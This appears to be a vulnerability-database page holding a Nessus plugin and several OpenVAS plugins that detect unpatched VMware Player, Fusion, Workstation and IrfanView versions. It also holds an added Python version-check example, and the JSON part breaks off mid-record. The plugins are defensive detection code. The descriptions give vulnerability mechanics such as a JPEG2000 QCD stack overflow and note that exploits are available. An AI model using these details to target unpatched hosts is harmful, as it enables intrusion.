VMware Player 6.x < 6.0.6 Multiple Vulnerabilities (VMSA-2015-0004)
2015-06-16T00:00:00
ID: VMWARE_PLAYER_6_0_6_VMSA_2015-0004.NASL
Type: nessus
Reporter: This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2021-01-02T00:00:00
Description
The version of VMware Player installed on the remote Windows host is
6.x prior to 6.0.6. It is, therefore, affected by multiple
vulnerabilities:

  - An arbitrary code execution vulnerability exists due to
    a stack-based buffer overflow condition in the JPEG2000
    plugin that is triggered when parsing a Quantization
    Default (QCD) marker segment in a JPEG2000 (JP2) image
    file. A remote attacker can exploit this, using a
    specially crafted image, to execute arbitrary code or
    cause a denial of service condition. (CVE-2012-0897)

  - Multiple unspecified remote code execution
    vulnerabilities exist in the 'TPView.dll' and 'TPInt.dll'
    library files. (CVE-2015-2336, CVE-2015-2337)

  - The 'TPView.dll' and 'TPInt.dll' library files fail to
    properly handle memory allocation. A remote attacker can
    exploit this to cause a denial of service.
    (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)

  - A denial of service vulnerability exists due to improper
    validation of user-supplied input to a remote procedure
    call (RPC) command. An unauthenticated, remote attacker
    can exploit this, via a crafted command, to crash the
    host or guest operating systems. (CVE-2015-2341)
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(84219);
  script_version("1.12");
  script_cvs_date("Date: 2019/11/22");

  script_cve_id(
    "CVE-2012-0897",
    "CVE-2015-2336",
    "CVE-2015-2337",
    "CVE-2015-2338",
    "CVE-2015-2339",
    "CVE-2015-2340",
    "CVE-2015-2341"
  );
  script_bugtraq_id(
    51426,
    75092,
    75094,
    75095
  );
  script_xref(name:"VMSA", value:"2015-0004");

  script_name(english:"VMware Player 6.x < 6.0.6 Multiple Vulnerabilities (VMSA-2015-0004)");
  script_summary(english:"Checks the VMware Player version.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host has a virtualization application installed that is
affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of VMware Player installed on the remote Windows host is
6.x prior to 6.0.6. It is, therefore, affected by multiple
vulnerabilities:

  - An arbitrary code execution vulnerability exists due to
    a stack-based buffer overflow condition in the JPEG2000
    plugin that is triggered when parsing a Quantization
    Default (QCD) marker segment in a JPEG2000 (JP2) image
    file. A remote attacker can exploit this, using a
    specially crafted image, to execute arbitrary code or
    cause a denial of service condition. (CVE-2012-0897)

  - Multiple unspecified remote code execution
    vulnerabilities exist in the 'TPView.dll' and 'TPInt.dll'
    library files. (CVE-2015-2336, CVE-2015-2337)

  - The 'TPView.dll' and 'TPInt.dll' library files fail to
    properly handle memory allocation. A remote attacker can
    exploit this to cause a denial of service.
    (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)

  - A denial of service vulnerability exists due to improper
    validation of user-supplied input to a remote procedure
    call (RPC) command. An unauthenticated, remote attacker
    can exploit this, via a crafted command, to crash the
    host or guest operating systems. (CVE-2015-2341)");
  script_set_attribute(attribute:"see_also", value:"http://www.vmware.com/security/advisories/VMSA-2015-0004.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to VMware Player version 6.0.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-0897");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/06/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/06/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/16");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:player");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Version and install path are populated by the detection plugin.
  script_dependencies("vmware_player_detect.nasl");
  script_require_keys("SMB/Registry/Enumerated", "VMware/Player/Path", "VMware/Player/Version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

get_kb_item_or_exit("SMB/Registry/Enumerated");

version = get_kb_item_or_exit("VMware/Player/Version");
path = get_kb_item_or_exit("VMware/Player/Path");

# Only the 6.x branch is in scope here; the 7.x branch has its own plugin.
fixed = '6.0.6';
if (
  version =~ "^6\." &&
  ver_compare(ver:version, fix:fixed, strict:FALSE) == -1
)
{
  port = get_kb_item("SMB/transport");
  if (!port) port = 445;

  if (report_verbosity > 0)
  {
    report +=
      '\n  Path              : ' + path +
      '\n  Installed version : ' + version +
      '\n  Fixed version     : ' + fixed +
      '\n';
    security_warning(port:port, extra:report);
  }
  else security_warning(port);
}
else audit(AUDIT_INST_PATH_NOT_VULN, "VMware Player", version, path);
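The version gate applied by the plugin above, re-implemented as an added Python example (not Tenable's code) so that the numeric, component-wise comparison and the handling of short or tagged version strings can be exercised offline against constructed samples. The zero-padding reading of strict:FALSE is an assumption made here, not a statement of what misc_func.inc does.

```python
"""Added example, not Tenable's code: mirrors the VMware Player 6.x < 6.0.6
version gate so its edge cases can be checked without a scanner.
Assumption: strict=False pads a shorter version with zeros (6.0 -> 6.0.0)."""

import re

FIXED_VERSION = "6.0.6"                # fix version stated by the plugin
AFFECTED_BRANCH = re.compile(r"^6\.")  # plugin gate: version =~ "^6\."


def parse_version(ver):
    """Split a dotted version string into integer components.

    Only the leading digits of each field count, so a constructed sample
    such as '6.0.5 build-2443746' parses as [6, 0, 5].
    """
    parts = []
    for field in ver.strip().split("."):
        m = re.match(r"\d+", field)
        if not m:
            break
        parts.append(int(m.group()))
    return parts


def ver_compare(ver, fix, strict=False):
    """Return -1, 0 or 1 as ver is older than, equal to or newer than fix.

    strict=False (assumed meaning) pads the shorter version with zeros;
    strict=True returns None when ver has fewer fields than fix, because
    '6.0' on its own could be anything from 6.0.0 upwards.
    """
    a, b = parse_version(ver), parse_version(fix)
    if len(a) < len(b):
        if strict:
            return None
        a = a + [0] * (len(b) - len(a))
    elif len(b) < len(a):
        b = b + [0] * (len(a) - len(b))
    return (a > b) - (a < b)


def is_vulnerable(version):
    """Mirror the plugin's decision: 6.x branch and numerically below 6.0.6.

    A plain string comparison would get '6.0.10' wrong ('6.0.10' < '6.0.6'
    as text), which is why the fields are compared as integers.
    """
    if not AFFECTED_BRANCH.match(version):
        return False  # other branches (e.g. 7.x) are out of scope here
    return ver_compare(version, FIXED_VERSION, strict=False) == -1


def report(path, version):
    """Build the same three-line finding the plugin appends to its warning."""
    return ("\n  Path              : " + path +
            "\n  Installed version : " + version +
            "\n  Fixed version     : " + FIXED_VERSION + "\n")


if __name__ == "__main__":
    # Constructed sample inventory; the paths and versions are not real hosts.
    samples = {
        "C:\\Program Files (x86)\\VMware\\VMware Player": "6.0.5",
        "D:\\Apps\\VMware Player": "6.0.10",
        "E:\\VMware": "7.0.0",
    }
    for p, v in samples.items():
        verdict = "VULNERABLE" if is_vulnerable(v) else "not affected"
        print(verdict, v, p)
```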
script_tag(name:\"summary\", value:\"The host is installed with VMware Fusion\n and is prone to denial-of-service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation\n issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Fusion 6.x before 6.0.6 and 7.x\n before 7.0.1 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Fusion version 6.0.6\n or 7.0.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vmware_fusion_detect_macosx.nasl\");\n script_mandatory_keys(\"VMware/Fusion/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(vmwareVer =~ \"^7\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"7.0.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"7.0.1\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], 
"description": "The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810679", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810679", "type": "openvas", "title": "VMware Player 'RPC Command' Denial of Service Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_player_rpc_dos_vuln_win.nasl 11888 2018-10-12 15:27:49Z cfischer $\n#\n# VMware Player 'RPC Command' Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810679\");\n script_version(\"$Revision: 11888 $\");\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 17:27:49 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 17:39:57 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Player 'RPC Command' Denial of Service Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation\n issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Player 6.x before 6.0.6\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Player version\n 6.0.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n 
script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Player/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "description": "The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810680", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810680", "type": "openvas", "title": "VMware Player 'RPC Command' Denial of Service Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_player_rpc_dos_vuln_lin.nasl 11977 2018-10-19 07:28:56Z mmartin $\n#\n# VMware Player 'RPC Command' Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810680\");\n script_version(\"$Revision: 11977 $\");\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 09:28:56 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 17:46:25 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Player 'RPC Command' Denial of Service Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation\n issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Player 6.x before 6.0.6\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Player version\n 6.0.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n 
script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Player/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:10:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0897"], "description": "This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.", "modified": "2017-04-12T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:802576", "href": "http://plugins.openvas.org/nasl.php?oid=802576", "type": "openvas", "title": "IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_irfanview_jpeg2000_bof_vuln.nasl 5940 2017-04-12 09:02:05Z teissa $\n#\n# IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code.\n Impact Level: Application\";\ntag_affected = \"IrfanView JPEG-2000 Plugin version prior to 4.33\";\ntag_insight = \"The flaw is due to an error in the JPEG2000 plug-in when processing\n the Quantization Default (QCD) marker segment. This can be exploited to cause\n a stack-based buffer overflow via a specially crafted JPEG2000 (JP2) file.\";\ntag_solution = \"Upgrade IrfanView JPEG-2000 Plugin version to 4.33 or later\n For updates refer to http://www.irfanview.com/plugins.htm\";\ntag_summary = \"This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(802576);\n script_version(\"$Revision: 5940 $\");\n script_cve_id(\"CVE-2012-0897\");\n script_bugtraq_id(51426);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 11:28:20 +0530 (Wed, 01 Feb 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47360\");\n script_xref(name : \"URL\" , value : \"http://www.irfanview.com/plugins.htm\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/72398\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_irfanview_detect.nasl\");\n script_require_keys(\"IrfanView/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variable initialization\npath = \"\";\nplgVer = \"\";\nirViewVer = NULL;\n\nirViewVer = get_kb_item(\"IrfanView/Ver\");\nif(isnull(irViewVer)){\n exit(0);\n}\n\n# Get IrfanView JPEG-2000 Plugin installed path\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IrfanView\",\n item:\"UninstallString\");\nif(path != NULL)\n{\n irViewPath = path - \"\\iv_uninstall.exe\" + \"\\Plugins\\JPEG2000.dll\";\n plgVer = GetVersionFromFile(file:irViewPath, verstr:\"prod\");\n if(!plgVer){\n exit(0);\n }\n\n ## Check IrfanView JPEG-2000 Plugin version < 4.33\n if(version_is_less(version:plgVer, test_version:\"4.33\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-26T15:08:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0897"], "description": "This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.", "modified": "2020-04-22T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:1361412562310802576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802576", "type": "openvas", "title": "IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n#\n# IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802576\");\n script_version(\"2020-04-22T10:27:30+0000\");\n script_cve_id(\"CVE-2012-0897\");\n script_bugtraq_id(51426);\n script_tag(name:\"last_modification\", value:\"2020-04-22 10:27:30 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 11:28:20 +0530 (Wed, 01 Feb 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47360\");\n script_xref(name:\"URL\", value:\"http://www.irfanview.com/plugins.htm\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/72398\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_irfanview_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"IrfanView/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"IrfanView JPEG-2000 Plugin version prior to 4.33\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in the JPEG2000 plug-in when processing\n the Quantization Default (QCD) marker segment. This can be exploited to cause\n a stack-based buffer overflow via a specially crafted JPEG2000 (JP2) file.\");\n script_tag(name:\"solution\", value:\"Upgrade IrfanView JPEG-2000 Plugin version to 4.33 or later.\");\n script_tag(name:\"summary\", value:\"This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nirViewVer = get_kb_item(\"IrfanView/Ver\");\nif(isnull(irViewVer)){\n exit(0);\n}\n\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IrfanView\",\n item:\"UninstallString\");\nif(path != NULL)\n{\n irViewPath = path - \"\\iv_uninstall.exe\" + \"\\Plugins\\JPEG2000.dll\";\n plgVer = GetVersionFromFile(file:irViewPath, verstr:\"prod\");\n if(!plgVer){\n exit(0);\n }\n\n if(version_is_less(version:plgVer, test_version:\"4.33\")){\n report = report_fixed_ver(installed_version:plgVer, fixed_version:\"4.33\", install_path:irViewPath);\n security_message(port:0, data:report);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341", "CVE-2015-1044", "CVE-2014-8370", "CVE-2015-1043"], "description": "The host is installed with\n VMware Workstation and is 
prone to multiple vulnerabilities.", "modified": "2018-10-24T00:00:00", "published": "2016-05-20T00:00:00", "id": "OPENVAS:1361412562310806759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806759", "type": "openvas", "title": "VMware Workstation Multiple Vulnerabilities May16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_mult_dos_vuln_may16_win.nasl 12051 2018-10-24 09:14:54Z asteins $\n#\n# VMware Workstation Multiple Vulnerabilities May16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806759\");\n script_version(\"$Revision: 12051 $\");\n script_cve_id(\"CVE-2014-8370\", \"CVE-2015-1043\", \"CVE-2015-1044\", \"CVE-2015-2341\");\n script_bugtraq_id(72338, 72337, 72336, 75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 11:14:54 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-20 09:35:33 +0530 (Fri, 20 May 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Workstation Multiple Vulnerabilities May16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - An arbitrary file write issue.\n\n - An input validation issue in the Host Guest File System (HGFS).\n\n - An input validation issue in VMware Authorization process (vmware-authd).\n\n - An input validation issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n attacker for for privilege escalation and to cause Denial of Service.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation 10.x prior to version\n 10.0.5 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation 
version\n 10.0.5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^10\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"10.0.5\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"10.0.5\");\n security_message(data:report );\n exit(0);\n }\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-17T14:26:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341", "CVE-2015-1044", "CVE-2014-8370", "CVE-2015-1043"], "description": "The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2016-05-20T00:00:00", "id": "OPENVAS:1361412562310806760", "href": 